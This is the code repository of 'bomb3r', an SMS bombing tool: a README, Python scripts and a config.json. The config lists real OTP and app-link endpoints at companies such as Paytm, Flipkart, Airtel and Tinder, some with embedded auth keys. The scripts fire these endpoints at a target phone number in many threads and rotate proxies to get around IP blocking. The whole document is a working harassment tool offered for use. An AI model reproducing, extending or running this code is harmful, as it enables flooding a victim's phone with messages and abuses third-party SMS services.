├── LICENSE
├── Provider.py
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├── bomb3r.exe
├── bomber.py
├── config.json
└── requirements.txt
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1 | import requests
2 | import urllib3
3 | import json
4 | import random
5 |
6 | DEFAULT_TIMEOUT = 30
7 | VERIFY = True
8 | not VERIFY and urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
9 |
10 | with open('config.json', 'r') as f:
11 | PROVIDERS = json.load(f)['providers']
12 |
13 | class Provider:
14 |
15 | def __init__(self, target, proxy={}, verbose=False, cc='91', config=False):
16 | if config:
17 | self.config = config
18 | else:
19 | self.config = random.choice(PROVIDERS[cc if cc in PROVIDERS else 'multi'])
20 | self.target = target
21 | self.headers = self._headers()
22 | self.done = False
23 | self.proxy = proxy
24 | self.verbose = verbose
25 | self.cc = cc
26 |
27 | def _headers(self):
28 | tmp_headers = {
29 | "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0"}
30 | if 'headers' in self.config:
31 | tmp_headers.update(self.config['headers'])
32 | return tmp_headers
33 |
34 | def _data(self):
35 | data = self.config['data']
36 | if 'cc_target' in self.config:
37 | data[self.config['cc_target']] += self.cc
38 | data[self.config['target_param']] += self.target
39 | return data
40 |
41 | def _get(self):
42 | url = self.config['url'] + self.target
43 | if 'cc_target' in self.config:
44 | url += '&' + self.config['cc_target'] + '=' + self.cc
45 | return requests.get(url, headers=self.headers, timeout=DEFAULT_TIMEOUT, proxies=self.proxy, verify=VERIFY)
46 |
47 | def _post(self):
48 | if 'data_type' in self.config and self.config['data_type'].lower() == "json":
49 | return requests.post(self.config['url'], json=self.data, headers=self.headers, timeout=DEFAULT_TIMEOUT, proxies=self.proxy, verify=VERIFY)
50 | else:
51 | return requests.post(self.config['url'], data=self.data, headers=self.headers, timeout=DEFAULT_TIMEOUT, proxies=self.proxy, verify=VERIFY)
52 |
53 | def start(self):
54 | if self.config['method'] == 'GET':
55 | self.resp = self._get()
56 | elif self.config['method'] == 'POST':
57 | self.data = self._data()
58 | self.resp = self._post()
59 | self.done = True
60 |
61 | def status(self):
62 | if self.config['identifier'] in self.resp.text:
63 | self.verbose and print(
64 | '{:12}: success'.format(self.config['name']))
65 | return True
66 | else:
67 | self.verbose and print('{:12}: failed'.format(self.config['name']))
68 | return False
69 |
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1 | # bomb3r 💣
2 |
3 | ## This repository is currently unmaintained.
4 | ## Use this fork [YetAnotherSMSBomber](https://github.com/AvinashReddy3108/YetAnotherSMSBomber)
5 |
6 | Made with ❤ in IN.
7 |
8 | ## For Windows 10/8.x/7
9 |
10 | > Use windows [releases](https://github.com/iMro0t/bomb3r/releases) (windows release is not up-to date)
11 |
12 | ## Installation
13 |
14 | Use the package manager [pip](https://pip.pypa.io/en/stable/installing/) to install bomb3r.
15 |
16 | ```bash
17 | git clone https://github.com/iMro0t/bomb3r.git
18 | cd bomb3r
19 | pip3 install -r requirements.txt
20 | ```
21 |
22 | ## Usage
23 |
24 | ```bash
25 | python3 bomber.py
26 | ```
27 |
28 | where TARGET is target mobile number.
29 |
30 | ## Options
31 |
32 | ```
33 | usage: bomber.py [-h] [--sms SMS] [--threads THREADS] TARGET
34 |
35 | positional arguments:
36 | TARGET Target mobile number without country code (default:+91)
37 |
38 | optional arguments:
39 | -h, --help show this help message and exit
40 | --sms SMS, -S SMS Number of sms to target (default: 10)
41 | --country COUNTRY, -c COUNTRY
42 | Country code without (+) sign (default: 91)
43 | --threads THREADS, -T THREADS
44 | Number of threads (default: 10)
45 | --proxy, -p Use proxy for bombing (It is advisable to use this
46 | option if you are bombing more than 50 sms)
47 | --verbose, -v Verbose
48 | --verify, -V To verify all providers are working or not
49 | ```
50 |
51 | ## Changelog
52 |
53 | ```
54 | -- Mar, 2020
55 | - added more configs
56 | - fixed some bugs
57 |
58 | -- Nov, 2019
59 | - multiple country option
60 | - more api for india
61 | - proxy feature to avoid ip blocking
62 | - new verbose and verify option
63 | ```
64 |
65 | ## License
66 |
67 | This project is licensed under the [GNU General Public License v3.0](https://github.com/iMro0t/bomb3r/blob/master/LICENSE)
68 |
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1 | #!/usr/bin/python3
2 |
3 | import requests
4 | import argparse
5 | from concurrent.futures import ThreadPoolExecutor
6 | import json
7 | import time
8 | from Provider import Provider
9 |
10 | # args
11 |
12 | parser = argparse.ArgumentParser()
13 | parser.add_argument('target', metavar='TARGET', type=lambda value: (_ for _ in ()).throw(argparse.ArgumentTypeError(f'{value} is an invalid mobile number')) if len(value) != 10 else value,
14 | help='Target mobile number without country code')
15 | parser.add_argument('--sms', '-S', type=int,
16 | help='Number of sms to target (default: 20)', default=20)
17 | parser.add_argument('--country', '-c', type=int,
18 | help='Country code without (+) sign (default: 91)', default=91)
19 | parser.add_argument('--threads', '-T', type=int,
20 | help='Max number of concurrent HTTP(s) requests (default: 20)', default=20)
21 | parser.add_argument('--proxy', '-p', action='store_true',
22 | help='Use proxy for bombing (It is advisable to use this option if you are bombing more than 50 sms)')
23 | parser.add_argument('--verbose', '-v', action='store_true',
24 | help='Verbose')
25 | parser.add_argument('--verify', '-V', action='store_true',
26 | help='To verify all providers are working or not')
27 | args = parser.parse_args()
28 |
29 | # config loading
30 | target = str(args.target)
31 | no_of_threads = args.threads
32 | no_of_sms = args.sms
33 | fails, success = 0, 0
34 | not args.verbose and not args.verify and print(
35 | f'Target: {target} | Threads: {no_of_threads} | SMS: {no_of_sms}')
36 |
37 | # proxy setup
38 | # https://gimmeproxy.com/api/getProxy?curl=true&protocol=http&supportsHttps=true
39 |
40 |
41 | def get_proxy():
42 | args.verbose and print('Gethering proxy...')
43 | curl = requests.get(
44 | 'https://gimmeproxy.com/api/getProxy?curl=true&protocol=http&supportsHttps=true').text
45 | if 'limit' in curl:
46 | print('Proxy limitation error. Try without `-p` or `--proxy` argument')
47 | exit()
48 | args.verbose and print(f'Using Proxy: {curl}')
49 | return {"http": curl, "https": curl}
50 |
51 |
52 | proxies = get_proxy() if args.proxy else False
53 | # proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
54 |
55 | # bomber function
56 |
57 |
58 | def bomber(p):
59 | global fails, success, no_of_sms
60 | if not args.verify and p is None or success > no_of_sms:
61 | return
62 | elif not p.done:
63 | try:
64 | p.start()
65 | if p.status():
66 | success += 1
67 | else:
68 | fails += 1
69 | except:
70 | fails += 1
71 | args.verbose or args.verify and print(
72 | '{:12}: error'.format(p.config['name']))
73 | not args.verbose and not args.verify and print(
74 | f'Bombing : {success+fails}/{no_of_sms} | Success: {success} | Failed: {fails}', end='\r')
75 |
76 |
77 | # threadsssss
78 | start = time.time()
79 | if args.verify:
80 | providers = json.load(open('config.json', 'r'))['providers']
81 | pall = [p for x in providers.values() for p in x]
82 | with ThreadPoolExecutor(max_workers=len(pall)) as executor:
83 | for config in pall:
84 | executor.submit(bomber, Provider(target, proxy=proxies,
85 | verbose=True, cc=str(args.country), config=config))
86 | print(f'Total {len(pall)} providers available')
87 | else:
88 | with ThreadPoolExecutor(max_workers=no_of_threads) as executor:
89 | for i in range(no_of_sms):
90 | p = Provider(target, proxy=proxies,
91 | verbose=args.verbose, cc=str(args.country))
92 | executor.submit(bomber, p)
93 | end = time.time()
94 |
95 |
96 | # finalize
97 | print(f'\nSuccess: {success} | Failed: {fails}')
98 | print(f'Took {end-start:.2f}s to complete')
99 |
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1 | {
2 | "version": "1.1",
3 | "created_by": "https://github.com/iMro0t/",
4 | "providers": {
5 | "91": [
6 | {
7 | "name": "confirmtkt",
8 | "method": "GET",
9 | "url": "https://securedapi.confirmtkt.com/api/platform/register?newOtp=true&mobileNumber=",
10 | "identifier": "false"
11 | },
12 | {
13 | "name": "justdial",
14 | "method": "GET",
15 | "url": "https://t.justdial.com/api/india_api_write/18july2018/sendvcode.php?mobile=",
16 | "identifier": "sent"
17 | },
18 | {
19 | "name": "frotels",
20 | "method": "POST",
21 | "url": "https://www.frotels.com/appsendsms.php",
22 | "target_param": "mobno",
23 | "data": {
24 | "mobno": ""
25 | },
26 | "identifier": "sent"
27 | },
28 | {
29 | "name": "gapoon",
30 | "method": "POST",
31 | "url": "https://www.gapoon.com/userSignup",
32 | "target_param": "mobile",
33 | "data": {
34 | "mobile": "",
35 | "email": "a@a.com",
36 | "name": "a"
37 | },
38 | "identifier": "1"
39 | },
40 | {
41 | "name": "housing",
42 | "method": "POST",
43 | "url": "https://login.housing.com/api/v2/send-otp",
44 | "target_param": "phone",
45 | "data_type": "json",
46 | "data": {
47 | "phone": ""
48 | },
49 | "identifier": "Sent"
50 | },
51 | {
52 | "name": "porter",
53 | "method": "POST",
54 | "url": "https://porter.in/restservice/send_app_link_sms",
55 | "target_param": "phone",
56 | "data": {
57 | "phone": "",
58 | "referrer_string": "",
59 | "brand": "porter"
60 | },
61 | "identifier": "true"
62 | },
63 | {
64 | "name": "cityflo",
65 | "method": "POST",
66 | "url": "https://cityflo.com/website-app-download-link-sms/",
67 | "target_param": "mobile_number",
68 | "data": {
69 | "mobile_number": ""
70 | },
71 | "identifier": "sent"
72 | },
73 | {
74 | "name": "nnnow",
75 | "method": "POST",
76 | "url": "https://api.nnnow.com/d/api/appDownloadLink",
77 | "target_param": "mobileNumber",
78 | "data": {
79 | "mobileNumber": ""
80 | },
81 | "identifier": "true"
82 | },
83 | {
84 | "name": "ajio",
85 | "method": "POST",
86 | "url": "https://login.web.ajio.com/api/auth/signupSendOTP",
87 | "target_param": "mobileNumber",
88 | "data": {
89 | "firstName": "xxps",
90 | "login": "wiqpdl223@wqew.com",
91 | "password": "QASpw@1s",
92 | "genderType": "Male",
93 | "mobileNumber": "",
94 | "requestType": "SENDOTP"
95 | },
96 | "identifier": "1"
97 | },
98 | {
99 | "name": "happyeasygo",
100 | "method": "GET",
101 | "url": "https://www.happyeasygo.com/heg_api/user/sendRegisterOTP.do?phone=91%20",
102 | "identifier": "true"
103 | },
104 | {
105 | "name": "unacademy",
106 | "method": "POST",
107 | "url": "https://unacademy.com/api/v1/user/get_app_link/",
108 | "target_param": "phone",
109 | "data_type": "json",
110 | "data": {
111 | "phone": ""
112 | },
113 | "identifier": "sent"
114 | },
115 | {
116 | "name": "treebo",
117 | "method": "POST",
118 | "url": "https://www.treebo.com/api/v2/auth/login/otp/",
119 | "target_param": "phone_number",
120 | "data": {
121 | "phone_number": ""
122 | },
123 | "identifier": "sent"
124 | },
125 | {
126 | "name": "mobikwik",
127 | "method": "POST",
128 | "url": "https://webapi.mobikwik.com/p/account/otp/cell/v2",
129 | "target_param": "cell",
130 | "data_type": "json",
131 | "data": {
132 | "cell": ""
133 | },
134 | "headers": {
135 | "X-MClient": "0"
136 | },
137 | "identifier": "true"
138 | },
139 | {
140 | "name": "airtel",
141 | "method": "GET",
142 | "url": "https://www.airtel.in/referral-api/core/notify?messageId=map&rtn=",
143 | "identifier": "Success"
144 | },
145 | {
146 | "name": "pharmeasy",
147 | "method": "POST",
148 | "url": "https://pharmeasy.in/api/auth/requestOTP",
149 | "target_param": "contactNumber",
150 | "data_type": "json",
151 | "data": {
152 | "contactNumber": ""
153 | },
154 | "identifier": "resendSmsCounter"
155 | },
156 | {
157 | "name": "mylescars",
158 | "method": "POST",
159 | "url": "https://www.mylescars.com/usermanagements/chkContact",
160 | "target_param": "contactNo",
161 | "data": {
162 | "contactNo": ""
163 | },
164 | "identifier": "success@::::"
165 | },
166 | {
167 | "name": "grofers",
168 | "method": "POST",
169 | "url": "https://grofers.com/v2/accounts/",
170 | "target_param": "user_phone",
171 | "data": {
172 | "user_phone": ""
173 | },
174 | "headers": {
175 | "auth_key": "3f0b81a721b2c430b145ecb80cfdf51b170bf96135574e7ab7c577d24c45dbd7"
176 | },
177 | "identifier": "We have sent"
178 | },
179 | {
180 | "name": "dream11",
181 | "method": "POST",
182 | "url": "https://api.dream11.com/sendsmslink",
183 | "target_param": "mobileNum",
184 | "data": {
185 | "siteId": "1",
186 | "mobileNum": "",
187 | "appType": "androidfull"
188 | },
189 | "identifier": "true"
190 | },
191 | {
192 | "name": "cashify",
193 | "method": "GET",
194 | "url": "https://www.cashify.in/api/cu01/v1/app-link?mn=",
195 | "identifier": "Successfully"
196 | },
197 | {
198 | "name": "paytm",
199 | "method": "POST",
200 | "url": "https://commonfront.paytm.com/v4/api/sendsms",
201 | "target_param": "phone",
202 | "data_type": "json",
203 | "data": {
204 | "phone": "",
205 | "guid":"2952fa812660c58dc160ca6c9894221d"
206 | },
207 | "identifier": "202"
208 | }
209 | ],
210 | "multi": [
211 | {
212 | "name": "flipkart",
213 | "method": "POST",
214 | "cc_target": "loginId",
215 | "url": "https://www.flipkart.com/api/5/user/otp/generate",
216 | "target_param": "loginId",
217 | "data": {
218 | "loginId": "+"
219 | },
220 | "headers": {
221 | "X-user-agent": "Mozilla/5.0 (X11; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0 FKUA/website/41/website/Desktop",
222 | "Origin": "https://www.flipkart.com",
223 | "Content-Type": "application/x-www-form-urlencoded"
224 | },
225 | "identifier": "emailMask"
226 | },
227 | {
228 | "name":"qlean",
229 | "method": "POST",
230 | "cc_target": "phone",
231 | "url": "https://qlean.ru/clients-api/v2/sms_codes/auth/request_code",
232 | "target_param": "phone",
233 | "data": {
234 | "phone": ""
235 | },
236 | "identifier":"request_id"
237 | },
238 | {
239 | "name": "mail.ru",
240 | "method": "POST",
241 | "url": "https://cloud.mail.ru//api/v2/notify/applink",
242 | "cc_target": "phone",
243 | "target_param":"phone",
244 | "data_type":"json",
245 | "data":{
246 | "phone": "+",
247 | "api": "2",
248 | "email": "email",
249 | "x-email": "x-email"
250 | },
251 | "identifier":"200"
252 | },
253 | {
254 | "name":"gotinder",
255 | "method": "POST",
256 | "cc_target": "phone_number",
257 | "url": "https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru",
258 | "target_param": "phone_number",
259 | "data": {
260 | "phone_number": ""
261 | },
262 | "identifier":"200"
263 | },
264 | {
265 | "name":"youla.ru",
266 | "method":"POST",
267 | "cc_target":"phone",
268 | "target_param":"phone",
269 | "url":"https://youla.ru/web-api/auth/request_code",
270 | "data_type":"json",
271 | "data":{
272 | "phone": "+"
273 | },
274 | "identifier":"code_length"
275 | },
276 | {
277 | "name":"ivi.ru",
278 | "method":"POST",
279 | "cc_target":"phone",
280 | "target_param":"phone",
281 | "url":"https://api.ivi.ru/mobileapi/user/register/phone/v6",
282 | "data":{
283 | "phone":""
284 | },
285 | "identifier":"true"
286 | },
287 | {
288 | "name":"delitime.ru",
289 | "method":"POST",
290 | "cc_target":"SignupForm[username]",
291 | "target_param":"SignupForm[username]",
292 | "url":"https://api.delitime.ru/api/v2/signup",
293 | "data":{
294 | "SignupForm[username]":"",
295 | "SignupForm[device_type]":"3"
296 | },
297 | "identifier":"true"
298 | },
299 | {
300 | "name":"icq.com",
301 | "method":"POST",
302 | "cc_target":"msisdn",
303 | "target_param":"msisdn",
304 | "url":"https://www.icq.com/smsreg/requestPhoneValidation.php",
305 | "data":{
306 | "msisdn":"",
307 | "locale":"en",
308 | "k": "ic1rtwz1s1Hj1O0r",
309 | "r": "45559"
310 | },
311 | "identifier":"200"
312 | }
313 | ]
314 | }
315 | }
316 |
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2 |
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